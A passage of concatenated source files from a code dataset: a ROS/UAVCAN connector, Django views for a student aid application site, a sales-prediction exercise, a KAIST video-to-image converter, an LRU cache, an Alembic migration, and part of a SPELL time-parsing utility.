opcode=uavcan.protocol.param.ExecuteOpcode.Request().OPCODE_SAVE\n )\n _uav_outgoing.put(request)\n try:\n response = _uav_incoming_param.get(\n block=True,\n timeout=PARAMETER_REQ_TIMEOUT,\n )\n return SUCCESS if response.ok else FAILURE\n except queue.Empty:\n return FAILURE\n\n def __init__(self):\n rospy.init_node(\"wibotic_connector_can\")\n super(ROSNodeThread, self).__init__()\n self.daemon = True\n\n def run(self):\n rospy.loginfo(\"ROS Thread Initialized\")\n node = ROSNodeThread.Node()\n try:\n rospy.Service(\n \"~read_parameter\",\n srv.ReadParameter,\n node.handle_param_read,\n )\n rospy.Service(\n \"~write_parameter\",\n srv.WriteParameter,\n node.handle_param_write,\n )\n rospy.Service(\n \"~list_parameters\",\n srv.ListParameters,\n node.handle_param_list,\n )\n rospy.Service(\n \"~save_parameters\",\n srv.SaveParameters,\n node.handle_param_save,\n )\n node.sender()\n except rospy.ROSInterruptException:\n pass\n rospy.loginfo(\"ROS Thread Finished\")\n\n\nclass UAVCanNodeThread(threading.Thread):\n class Node:\n outstanding_param_request = threading.Semaphore()\n\n def __init__(self, can_interface, node_id):\n uavcan.load_dsdl(DSDL_PATH)\n node_info = (\n uavcan.protocol.GetNodeInfo.Response()\n )\n node_info.name = \"com.wibotic.ros_connector\"\n node_info.software_version.major = 1\n try:\n self.uavcan_node = uavcan.make_node(\n can_interface,\n node_id=node_id,\n node_info=node_info,\n mode=uavcan.protocol.NodeStatus().MODE_OPERATIONAL,\n )\n except OSError:\n rospy.logerr(\n \"ERROR: Device not found. \"\n \"Please confirm the device name is correctly set!\"\n )\n else:\n self.monitor = uavcan.app.node_monitor.NodeMonitor(\n self.uavcan_node\n )\n self.uavcan_node.add_handler(\n uavcan.thirdparty.wibotic.WiBoticInfo,\n self.wibotic_info_callback,\n )\n\n def get_wibotic_node_id(self):\n online_nodes = self.monitor.get_all_node_id()\n for node_id in online_nodes:\n node_name = ascii_list_to_str(\n self.monitor.get(node_id).info.name\n )\n if node_name == WIBOTIC_NODE_NAME:\n return node_id\n return None\n\n def wibotic_info_callback(self, event):\n _uav_incoming_info.put(event.transfer.payload)\n\n def wibotic_param_callback(self, event):\n _uav_incoming_param.put(event.transfer.payload)\n self.outstanding_param_request.release()\n\n def send_pending(self):\n while True:\n send_item = _uav_outgoing.get()\n target_node_id = self.get_wibotic_node_id()\n if target_node_id is not None:\n self.outstanding_param_request.acquire()\n self.uavcan_node.request(\n send_item,\n target_node_id,\n self.wibotic_param_callback,\n )\n else:\n rospy.logwarn(\n \"No WiBotic device found on bus\"\n )\n\n def check_shutdown(self):\n if _shutting_down:\n self.uavcan_node.close()\n raise Shutdown(\"Node Shutdown\")\n\n def __init__(self):\n super(UAVCanNodeThread, self).__init__()\n self.daemon = True\n\n def run(self):\n rospy.loginfo(\"UAVCAN Thread Initialized\")\n\n if not rospy.has_param(\"~can_interface\"):\n rospy.set_param(\"~can_interface\", \"can0\")\n if not rospy.has_param(\"~uavcan_node_id\"):\n rospy.set_param(\"~uavcan_node_id\", 20)\n can_interface = rospy.get_param(\"~can_interface\")\n node_id = rospy.get_param(\"~uavcan_node_id\")\n node = UAVCanNodeThread.Node(can_interface, node_id)\n try:\n # Thread implicitly daemonic since parent thread is daemonic\n threading.Thread(\n target=node.send_pending\n ).start()\n node.uavcan_node.periodic(\n 1, node.check_shutdown\n )\n node.uavcan_node.spin()\n except uavcan.UAVCANException as e:\n rospy.logerr(e)\n except Shutdown as e:\n pass\n rospy.loginfo(\"UAVCAN Thread Finished\")\n\n\ndef graceful_shutdown(signal, frame):\n global _shutting_down\n if not _shutting_down:\n rospy.loginfo(\"Shutting Down\")\n\n _shutting_down = True\n rospy.signal_shutdown(\"Shutdown Requested\")\n for t in _threads:\n t.join(timeout=3)\n\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n rospy.loginfo(\"WiBotic ROS Interface\")\n\n _threads.append(UAVCanNodeThread())\n _threads.append(ROSNodeThread())\n\n for t in _threads:\n t.start()\n\n signal.signal(signal.SIGINT, graceful_shutdown)\n signal.signal(signal.SIGTERM, graceful_shutdown)\n rospy.loginfo(\"Press Ctrl+C to stop\")\n while True:\n time.sleep(1) # allow SIGINT to be handled\n","sub_path":"wibotic_connector_can/src/wibotic_connector_can/wiboticros.py","file_name":"wiboticros.py","file_ext":"py","file_size_in_byte":10463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"137604140","text":"# -*- coding:utf-8 -*-\n# Create your views here.\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.template import loader, RequestContext\nfrom forms import UserLoginForm, UserRegistrationForm, UserChangeForm, CreateOrderForm\nfrom forms import BarcodeForm\nfrom django.contrib import auth, messages\nfrom django.shortcuts import redirect\nfrom django.views.generic.simple import direct_to_template\nfrom django.contrib.auth.models import User\nfrom models import Facultet, Course, Program, Users, OrderReason, OrderStatus\nfrom models import Order, OrderDateInterval, OrderType, Admins\nfrom django.db import IntegrityError\nfrom django.core.exceptions import ValidationError\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom datetime import datetime\n\n\n\ndef login (request):\n form = UserLoginForm(request.POST or None)\n context = { 'form': form, }\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data.get('email', None)\n password = form.cleaned_data.get('password', None)\n user = auth.authenticate(username=username, password=password)\n if user and user.is_active:\n auth.login(request, user)\n ## Редирект на главную\n return HttpResponseRedirect( '/mainpage/' )\n ## Редирект на логин\n return render_to_response('login.html',context_instance=RequestContext(request, context))\n\n@login_required\ndef logout (request):\n auth.logout( request )\n return HttpResponseRedirect( '/mainpage/' )\n\ndef mainpage (request):\n form = UserLoginForm(request.POST or None)\n context = { 'form': form, }\n if request.method == 'POST' and form.is_valid():\n username = form.cleaned_data.get('username', None)\n password = form.cleaned_data.get('password', None)\n user = auth.authenticate(username=username, password=password)\n if user and user.is_active:\n auth.login(request, user)\n return render_to_response('mainpage.html',context_instance=RequestContext(request, context))\n\ndef registration (request):\n error = list()\n form = UserRegistrationForm(request.POST or None)\n\n if request.method == 'POST' and form.is_valid():\n email = form.cleaned_data.get('email', None)\n password = form.cleaned_data.get('password', None)\n first_name = form.cleaned_data.get('first_name', None)\n last_name = form.cleaned_data.get('last_name', None)\n father_name = form.cleaned_data.get('father_name', None)\n facultetId = form.cleaned_data.get('facultet', None)\n programId = form.cleaned_data.get('program', None)\n birthday= form.cleaned_data.get('birthday',None)\n courseId = form.cleaned_data.get('course',None)\n phonenumber = form.cleaned_data.get('phonenumber',None)\n adress = form.cleaned_data.get('adress',None)\n #Валидация на уникальеость email\n try :\n Users.create_all(email= email,password = password,\n first_name = first_name, last_name = last_name,\n father_name =father_name,\n facultet = facultetId, program = programId,\n birthday = birthday, course = courseId,\n phonenumber = phonenumber, adress = adress)\n except ValidationError:\n error.append( u'Пользователь с таким email уже зарегистрирован')\n form._errors['email']=form.error_class([u'Пользователь с таким email уже зарегистрирован'])\n del form.cleaned_data['email']\n context = {'form': form, 'error': error }\n return render_to_response('registration.html',context_instance=RequestContext(request, context))\n\n ##TODO: отправка письма регистрации\n\n #############################\n messages.success(request,u'Поздравляем! Вы зарегистрировались. Активируйте Вашу учетную запись. Инструкцию по активации Вы получите в письме.')\n return HttpResponseRedirect( '/mainpage/' )\n\n context = {'form': form, 'error': error }\n return render_to_response('registration.html',context_instance=RequestContext(request, context))\n\n@login_required\ndef change_user_data(request):\n error = list()\n try:\n user = request.user\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n profile = Users.objects.get(user = user)\n except ObjectDoesNotExist:\n error.append(u'Невозможно загрузить данные профиля')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n data = {\n 'first_name' : user.first_name,\n 'last_name' : user.last_name,\n 'father_name': profile.father_name,\n 'facultet' : profile.facultet,\n 'program' : profile.program,\n 'birthday' : profile.birthday,\n 'course' : profile.course,\n 'phonenumber': profile.phonenumber,\n 'adress' : profile.adress\n }\n form = UserChangeForm(request.POST or data)\n\n if request.method == 'POST' and form.is_valid():\n user.first_name = form.cleaned_data.get('first_name', None)\n user.last_name = form.cleaned_data.get('last_name', None)\n profile.father_name = form.cleaned_data.get('father_name', None)\n profile.facultet = form.cleaned_data.get('facultet', None)\n profile.program = form.cleaned_data.get('program', None)\n profile.birthday = form.cleaned_data.get('birthday',None)\n profile.course = form.cleaned_data.get('course',None)\n profile.phonenumber = form.cleaned_data.get('phonenumber',None)\n profile.adress = form.cleaned_data.get('adress',None)\n user.save()\n profile.save()\n messages.success(request, u'Данные успешно обновлены')\n return HttpResponseRedirect( '/mainpage/' )\n context = {'form': form}\n return render_to_response('changeuserdata.html',context_instance=RequestContext(request, context))\n\n@login_required\ndef create_order(request, typeorder):\n error = list()\n try:\n user = request.user\n user_full = Users.objects.get(user = user)\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n type_order = OrderType.objects.get(name = typeorder)\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить тип заявления')\n context = {'error': error}\n return render_to_response ('404.html',context_instance=RequestContext(request,context))\n today = datetime.today()\n #exception -- > период подачи зая��лений не наступил\n try:\n date_interval = OrderDateInterval.objects.get(first_date__lte = today, last_date__gte = today, order_type = type_order )\n except ObjectDoesNotExist:\n messages.warning(request, u'На данный момент регистрация не открыта')\n return HttpResponseRedirect( '/mainpage/' )\n try:\n Order.objects.get(user = user, order_date_interval = date_interval, order_type = type_order)\n except ObjectDoesNotExist:\n try:\n form = CreateOrderForm(typeorder, date_interval.mandat.name, request.POST or None)\n except:\n error.append(u'Невозможно сформировать форму')\n context = {'error': error}\n return render_to_response ('404.html',context_instance=RequestContext(request,context))\n if request.method == 'POST' and form.is_valid():\n m = Order()\n m.user = user\n try:\n m.askable_money = 0 if form.cleaned_data.get('askable_money') is None else int(form.cleaned_data.get('askable_money'))\n except:\n error.append(u'Невозможно установить запрашиваемую Вами сумму')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n m.description = form.cleaned_data.get('description')\n m.documents = form.cleaned_data.get('documents')\n except:\n error.append(u'Не удается получить некотрые данные.(documents, description)')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n s = OrderStatus.objects.get(name = u'Зарегистрированно на сайте')\n except ObjectDoesNotExist:\n error.append(u'Невозможно найти таблицу статусов для матпомощи')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n m.creation_date = today\n m.order_date_interval = date_interval \n m.status = s\n m.first_name = user.first_name\n m.last_name = user.last_name\n m.father_name = user_full.father_name\n m.facultet = user_full.facultet\n m.program = user_full.program\n m.birthday = user_full.birthday\n m.course = user_full.course\n m.phonenumber = user_full.phonenumber\n m.adress = user_full.adress\n m.order_type = type_order\n m.save()\n for r in form.cleaned_data.get('reason',None):\n try:\n reason = OrderReason.objects.get(id = int(r), order_type = type_order)\n except:\n error.append(u'Невозможно установить льготные категории')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n m.reason.add(reason)\n m.replyable_money = False\n m.save()\n messages.success(request, u'Поздравляем, заявление подано!')\n return HttpResponseRedirect( '/mainpage/' )\n reasonwithaskable = ','.join([str(i.id) for i in OrderReason.objects.all().filter(with_askable = True, active = True, order_type = type_order)])\n context = {'form' : form, 'reasonwithaskable': reasonwithaskable, 'typeorder': typeorder}\n return render_to_response('create_order.html', context_instance = RequestContext(request,context))\n messages.warning(request, u'Вы уже подали заявление')\n return HttpResponseRedirect( '/mainpage/' )\n\n@login_required\ndef delete_order(request, typeorder):\n error = list()\n today = datetime.today()\n try:\n user = request.user\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n type_order = OrderType.objects.get(name = typeorder)\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить тип заявления')\n context = {'error': error}\n return render_to_response ('404.html',context_instance=RequestContext(request,context))\n try:\n status = OrderStatus.objects.get(name = u'Зарегистрированно на сайте')\n except ObjectDoesNotExist:\n error.append(u'Невозможно найти таблицу статусов для матпомощи')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n date_interval = OrderDateInterval.objects.get(first_date__lte = today, last_date__gte = today, order_type = type_order )\n except ObjectDoesNotExist:\n messages.warning(request, u'На данный момент регистрация не открыта')\n return HttpResponseRedirect( '/mainpage/' )\n try:\n order = Order.objects.get(user = user, order_date_interval = date_interval, status = status, order_type = type_order)\n except ObjectDoesNotExist:\n messages.warning(request, u'Не удается найти Ваше заявление.')\n return HttpResponseRedirect( '/mainpage/')\n try:\n order.delete()\n except:\n messages.warning(request, u'Не удается удалить Ваше заявление')\n return HttpResponseRedirect('/mainpage')\n messages.success(request, u'Ваше заявление удалено!')\n return HttpResponseRedirect('/mainpage')\n\n@login_required\ndef print_order(request, typeorder):\n error = list()\n today = datetime.today()\n try:\n user = request.user\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n type_order = OrderType.objects.get(name = typeorder)\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить тип заявления')\n context = {'error': error}\n return render_to_response ('404.html',context_instance=RequestContext(request,context))\n try:\n date_interval = OrderDateInterval.objects.get(first_date__lte = today, last_date__gte = today, order_type = type_order)\n except ObjectDoesNotExist:\n messages.warning(request, u'На данный момент регистрация не открыта')\n return HttpResponseRedirect( '/mainpage/' )\n try:\n order = Order.objects.get(user = user, order_date_interval = date_interval )\n except ObjectDoesNotExist:\n messages.warning(request, u'Не удается найти Ваше заявление.')\n return HttpResponseRedirect( '/mainpage/')\n from myscripts import Report\n r = Report()\n return r.pdf(user.email, order, today, typeorder)\n\n@login_required\ndef admin_main_page(request):\n error = list()\n try:\n user = request.user\n except ObjectDoesNotExist:\n error.append(u'Невозможно установить пользователя')\n context = {'error': error}\n return render_to_response('404.html',context_instance=RequestContext(request, context))\n try:\n admin = Admins.objects.get(user = user)\n except ObjectDoesNotExist:\n error.append(u'У Вас нет прав для доступа!')\n context = {'error':error}\n return render_to_response('404.html',context_instance=RequestContext(request,context))\n form = BarcodeForm(request.POST or None)\n if request.method == 'POST' and form.is_valid():\n data = form.cleaned_data.get('barcode', None)\n ord_id, ord_type = data.split('$')\n try:\n order = Order.objects.get(id = ord_id)\n except ObjectDoesNotExist:\n form._errors['barcode'] = form.error_class([u'Такого заявления нет'])\n form.cleaned_data['barcode'] = ''\n context = {'form': form}\n return render_to_response('admin_main_page.html', context_instance = RequestContext(request,context))\n if order.facultet in admin.facultet.all() and order.order_type in admin.order_type.all():\n context = {'order': order}\n return render_to_response('admin_order_data.html', context_instance = RequestContext(request,context))\n else:\n form._errors['barcode'] = form.error_class([u'У Вас нет возможности посмотреть данное заявление'])\n form.cleaned_data['barcode'] = ''\n context = {'form': form}\n return render_to_response('admin_main_page.html', context_instance = RequestContext(request,context))\n\n\n\n\n","sub_path":"studenthelp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"516202405","text":"# Get the projected total sales.\r\n# September 20, 2019\r\n# CTI-110 P2T1 - Sales Prediction\r\n# Steve Jones\r\n\r\ntotal_sales = float(input('Enter the projected sales: '))\r\n\r\n# Calculate the profit as 23 percent of total sales.\r\nprofit = total_sales * 0.23\r\n\r\n# Display the profit.\r\nprint('The profit is $', profit)\r\n","sub_path":"P2T1_SalesPrediction_SteveJones.py","file_name":"P2T1_SalesPrediction_SteveJones.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"375368349","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport os\nimport glob\nimport numpy as np\nimport cv2 as cv\n\ndef save_img(dname, fn, i, frame_visible, frame_lwir):\n setName = os.path.basename(dname)\n vidName = os.path.basename(fn).split('_')[1].split('.')[0] \n imgDir = out_dir + '/' + setName\n\n cv.imwrite('{}/{}_{}_{:06d}.png'.format(\n imgDir, setName, vidName, i), np.concatenate((frame_visible, frame_lwir), axis=2))\n\nout_dir = 'data/kaist/images'\nif not os.path.exists(out_dir):\n os.makedirs(out_dir)\n\nfor dname in sorted(glob.glob('data/kaist/videos/set*')):\n visible_seq = sorted(glob.glob('{}/Visible_*.seq'.format(dname)))\n lwir_seq = sorted(glob.glob('{}/LWIR_*.seq'.format(dname)))\n\n for fn in zip(visible_seq, lwir_seq):\n visible = cv.VideoCapture(fn[0])\n lwir = cv.VideoCapture(fn[1])\n i = 0\n while True:\n ret1, frame_visible = visible.read()\n ret2, frame_lwir = lwir.read()\n\n assert ret1 == ret2\n\n if not ret1:\n break\n save_img(dname, fn[0], i, frame_visible, frame_lwir)\n i += 1\n print(fn)\n","sub_path":"scripts/convert_seqs_kaist.py","file_name":"convert_seqs_kaist.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"51212689","text":"from doubly_linked_list import DoublyLinkedList\nfrom doubly_linked_list import DoublyLinkedList\n\n\nclass LRUCache:\n def __init__(self, limit=10):\n self.limit = limit\n self.list = DoublyLinkedList()\n self.dict = {}\n\n \"\"\"\n Retrieves the value associated with the given key. Also\n needs to move the key-value pair to the top of the order\n such that the pair is considered most-recently used.\n Returns the value associated with the key or None if the\n key-value pair doesn't exist in the cache. \n \"\"\"\n\n def get(self, key):\n catch = self.dict.get(key)\n if catch != None:\n self.list.move_to_front(catch)\n return catch.value\n else:\n return catch\n \"\"\"\n Adds the given key-value pair to the cache. The newly-\n added pair should be considered the most-recently used\n entry in the cache. If the cache is already at max capacity\n before this entry is added, then the oldest entry in the\n cache needs to be removed to make room. Additionally, in the\n case that the key already exists in the cache, we simply \n want to overwrite the old value associated with the key with\n the newly-specified value. \n \"\"\"\n\n def set(self, key, value):\n node = self.list.add_to_head(value)\n\n if self.dict.get(key) == None:\n self.dict[key] = node\n if self.list.length > self.limit:\n for k, v in self.dict.items():\n if v == self.list.tail:\n del self.dict[k]\n self.list.remove_from_tail()\n break\n else:\n self.dict[key].delete()\n self.dict[key] = node\n self.list.length -= 1\n\n return node\n","sub_path":"lru_cache/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"287023490","text":"\"\"\"empty message\n\nRevision ID: 7a2f8d6f27fc\nRevises: 0158f7c00beb\nCreate Date: 2021-02-23 14:49:09.917838\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '7a2f8d6f27fc'\ndown_revision = '0158f7c00beb'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('systems', sa.Column('cloud_provider', sa.String(length=25), nullable=True))\n op.add_column('systems', sa.Column('display_name', sa.String(length=100), nullable=True))\n op.add_column('systems', sa.Column('fqdn', sa.String(length=100), nullable=True))\n op.add_column('systems', sa.Column('instance_type', sa.String(length=25), nullable=True))\n op.add_column('systems', sa.Column('state', sa.String(length=25), nullable=True))\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('systems', 'state')\n op.drop_column('systems', 'instance_type')\n op.drop_column('systems', 'fqdn')\n op.drop_column('systems', 'display_name')\n op.drop_column('systems', 'cloud_provider')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/7a2f8d6f27fc_.py","file_name":"7a2f8d6f27fc_.py","file_ext":"py","file_size_in_byte":1208,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"561197997","text":"################################################################################\n\n\"\"\"\n(c) SES-ASTRA 2008\n\nPACKAGE \n spell.utils.ttime\nFILE\n ttime.py\n \nDESCRIPTION\n Time management utilities\n \nCOPYRIGHT\n This software is the copyrighted work of SES ASTRA S.A.\n All rights reserved.\n \nPROJECT\n UGCS/USL\n \nAUTHOR\n Rafael Chinchilla Camara (GMV) & Fabien Bouleau (SES Engineering)\n\"\"\"\n\n################################################################################\n\n#*******************************************************************************\n# SPELL Imports\n#*******************************************************************************\n\n#*******************************************************************************\n# Local Imports\n#*******************************************************************************\n \n#*******************************************************************************\n# System Imports\n#*******************************************************************************\nimport datetime\nimport time\nfrom spell.lib.exception import DriverException\n \n#*******************************************************************************\n# Exceptions \n#*******************************************************************************\n \n#*******************************************************************************\n# Module globals\n#*******************************************************************************\n\n# The date/time formats accepted are:\n#\n# For absolute time:\n# \n# * dd-mmm-yyyy [hh:mm[:ss]]\n# * yyyy-mm-dd [hh:mm[:ss]]\n# * dd/mm/yyyy [hh:mm[:ss]]\n# * dd-mm-yyyy [hh:mm[:ss]]\n# \n# * dd-mmm-yyyy:hh:mm[:ss]\n# * yyyy-mm-dd:hh:mm[:ss]\n# * dd/mm/yyyy:hh:mm[:ss]\n# * dd-mm-yyyy:hh:mm[:ss]\n# \n# For relative times:\n# \n# * +ss.nnn or -ss.nnn\n# * +ddd hh:mm[:ss] or -ddd hh:mm[:ss]\n\n__all__ = ['TIME','NOW','TODAY','YESTERDAY','TOMORROW','DAY','HOUR','MINUTE','SECOND']\n\nNOW_STR = 'NOW'\nYESTERDAY_STR = 'YESTERDAY'\nTODAY_STR = 'TODAY'\nTOMORROW_STR = 'TOMORROW'\n\n################################################################################\nclass TIME(object):\n #===========================================================================\n def __init__(self, timestamp):\n ttime = ttime_class()\n self._val = None\n \n if isinstance(timestamp, TIME):\n if isinstance(timestamp._val, str):\n self._val = ttime.cnv(timestamp._val)\n else:\n self._val = timestamp._val\n elif isinstance(timestamp, datetime.datetime) or isinstance(timestamp, datetime.timedelta):\n self._val = timestamp\n elif isinstance(timestamp, str):\n if timestamp in (NOW_STR, TODAY_STR, YESTERDAY_STR, TOMORROW_STR):\n self._val = timestamp\n else:\n self._val = ttime.cnv(timestamp)\n else:\n self._val = ttime.cnv(timestamp)\n if self._val is None:\n raise DriverException(\"Invalid input for date/time: \" + repr(timestamp))\n \n #===========================================================================\n def value(self):\n ttime = ttime_class()\n \n if isinstance(self._val, str):\n return ttime.cnv(self._val)\n else:\n return self._val\n \n #===========================================================================\n def abs(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n val = datetime.datetime.utcnow() + val\n return time.mktime(val.timetuple())\n \n #===========================================================================\n def rel(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return val.days * 3600 * 24 + val.seconds + val.microseconds / 1000000 \n return None\n \n #===========================================================================\n def isAbs(self):\n val = self.value()\n if isinstance(val, datetime.datetime):\n return True\n return False\n \n #===========================================================================\n def isRel(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return True\n return False\n \n #===========================================================================\n def julianDay(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.timetuple()[7]\n \n #===========================================================================\n def year(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.year\n \n #===========================================================================\n def month(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.month\n \n #===========================================================================\n def day(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.day\n \n #===========================================================================\n def hour(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.hour\n \n #===========================================================================\n def minute(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.minute\n \n #===========================================================================\n def second(self):\n val = self.value()\n if isinstance(val, datetime.timedelta):\n return None\n return val.second\n \n #===========================================================================\n def __str__(self):\n val = self.value()\n res = None\n if isinstance(val, datetime.datetime):\n res = val.strftime('%d-%b-%Y %H:%M:%S')\n if val.microsecond != 0: res = res + \".%06i\" % val.microsecond\n elif isinstance(val, datetime.timedelta):\n res = ('%+04i %02i:%02i:%02i' \n % (val.days, val.seconds // 3600, \n val.seconds // 60 % 60, val.seconds % 60))\n if val.microseconds != 0: res = res + \".%06i\" % val.microseconds\n return res\n \n #===========================================================================\n def __translate(self, timestamp):\n if isinstance(timestamp, TIME):\n return timestamp\n else:\n return TIME(timestamp)\n \n #===========================================================================\n def __cmp__(self, other):\n ttime = self.__translate(other)\n val = self.value()\n val2 = ttime.value()\n \n if isinstance(val,datetime.timedelta) and isinstance(val2,datetime.datetime):\n return -1\n if isinstance(val,datetime.datetime) and isinstance(val2,datetime.timedelta):\n return 1\n \n if (val2 == val):\n return 0\n elif (val < val2):\n return -1\n elif (val > val2):\n return 1\n \n #===========================================================================\n def __add__(self, timestamp):\n return TIME(self.value() + self.__translate(timestamp).value())\n\n #===========================================================================\n def __sub__(self, timestamp):\n return TIME(self.value() - self.__translate(timestamp).value())\n\n #===========================================================================\n def __mul__(self, coef):\n return TIME(self.value() * coef)\n\n #===========================================================================\n def __radd__(self, timestamp):\n return TIME(self.value() + self.__translate(timestamp).value())\n\n #===========================================================================\n def __rsub__(self, timestamp):\n return TIME(self.value() - self.__translate(timestamp).value())\n\n #===========================================================================\n def __rmul__(self, coef):\n return TIME(self.value() * int(coef))\n\n################################################################################\nclass ttime_class(object):\n\n __isinitialized = False\n __instance = None\n \n #===========================================================================\n def __new__(cls):\n if not isinstance(ttime_class.__instance, cls):\n ttime_class.__instance = object.__new__(cls) \n return ttime_class.__instance\n\n #===========================================================================\n def __init__(self):\n if self.__isinitialized:\n return\n super(ttime_class, self).__init__()\n self.__isinitialized = True\n \n #===========================================================================\n def cnv(self, timestamp):\n \n mydt = datetime.datetime(1,1,1)\n evaluated = False\n\n datefmtlist = [ \n '%Y-%j-%H:%M:%S', '%Y-%j-%H:%M', '%Y-%j',\n '%Y-%j %H:%M:%S', '%Y-%j %H:%M', '%Y-%j',\n '%d-%b-%Y %H:%M:%S', '%d-%b-%Y %H:%M', '%d-%b-%Y',\n '%Y-%m-%d %H:%M:%S', '%Y-%m-%d %H:%M', '%Y-%m-%d',\n '%Y/%m/%d %H:%M:%S', '%Y/%m/%d %H:%M', '%Y/%m/%d',\n '%d/%m/%Y %H:%M:%S', '%d/%m/%Y %H:%M', '%d/%m/%Y',\n '%d-%m-%Y %H:%M:%S', '%d-%m-%Y %H:%M', '%d-%m-%Y',\n '%d-%b-%Y:%H:%M:%S', '%d-%b-%Y:%H:%M', '%d-%b-%Y',\n '%Y-%m-%d:%H:%M:%S', '%Y-%m-%d:%H:%M', '%Y-%m-%d',\n '%Y/%m/%d:%H:%M:%S', '%Y/%m/%d:%H:%M', '%Y/%m/%d',\n '%d/%m/%Y:%H:%M:%S', '%d/%m/%Y:%H:%M', '%d/%m/%Y',\n '%d-%m-%Y:%H:%M:%S', '%d-%m-%Y:%H:%M', '%d-%m-%Y',\n ]\n \n abshourfmtlist = [\n '%H:%M:%S', '%H:%M:%S', '%H:%M',\n ]\n\n # Split timestamp and microseconds\n\n ms = 0\n \n if isinstance(timestamp, float):\n ms = (timestamp - int(timestamp)) * 1000000\n elif isinstance(timestamp, str):\n items = timestamp.split('.')\n timestamp = items[0]\n if len(items) > 1: ms = int(items[1].ljust(6, '0'))\n\n # - ISO, European or OpenVMS date formats\n\n for fmt in datefmtlist:\n if not evaluated:\n try:\n val = mydt.strptime(timestamp, fmt)\n val = val.replace(microsecond = ms)\n evaluated = True\n except:\n pass\n \n # - or \n \n if not evaluated and (isinstance(timestamp, int) or isinstance(timestamp, float)):\n dd = int(timestamp / (3600 * 24)) \n hh = int(timestamp / 3600) % 24\n mm = int(timestamp / 60) % 60 \n ss = int(timestamp) % 60\n\n val = datetime.timedelta(days = dd, hours=hh, minutes=mm, seconds=ss, microseconds=ms)\n \n evaluated = True \n \n # +|-[dd] hh:mm[:ss]\n \n if not evaluated:\n try:\n tmp = timestamp\n if tmp[0] in ('+', '-'):\n # Capture the sign ('+' in '+dd hh:mm:ss') and remove it\n sign = 1\n if tmp[0] == '-':\n sign = -1\n tmp = tmp[1:]\n \n # Capture the day ('dd' in 'dd hh:mm:ss' if 'dd' exists)\n items = tmp.split(' ') \n mytime = items[0]\n dd = 0\n \n # In case we have '+hh:mm:ss' days = 0 and we go on with the time)\n if len(items) == 2:\n dd = eval(items[0].lstrip('0') or '0')\n mytime = items[1]\n \n # Capture the time ('hh' 'mm' and 'ss' in 'hh:mm:ss')\n items = mytime.split(':')\n hh = eval(items[0].lstrip('0') or '0')\n mm = eval(items[1].lstrip('0') or '0')\n ss = int(eval(items[2].lstrip('0') or '0'))\n \n # Normalize in case we have hours > 23\n # E.g. +2 26:00:00 becomes +3 02:00:00\n dd = dd + hh // 24\n hh = hh % 24\n\n # Apply the sign\n dd = dd * sign\n hh = hh * sign\n mm = mm * sign\n ss = ss * sign\n ms = ms * sign\n \n val = datetime.timedelta(days = dd, hours=hh, minutes=mm, seconds=ss, microseconds=ms)\n \n evaluated = True\n except:\n pass\n\n\n # Evaluated TODAY, NOW, YESTERDAY and TOMORROW\n \n if not evaluated:\n evaluated = True\n val = datetime.datetime.utcnow()\n if timestamp != NOW_STR:\n val = val.replace(hour=0, minute=0, second=0, microsecond=0)\n if timestamp == YESTERDAY_STR:\n val = val - datetime.timedelta(days = 1)\n elif timestamp == TOMORROW_STR:\n val = val + datetime.timedelta(days = 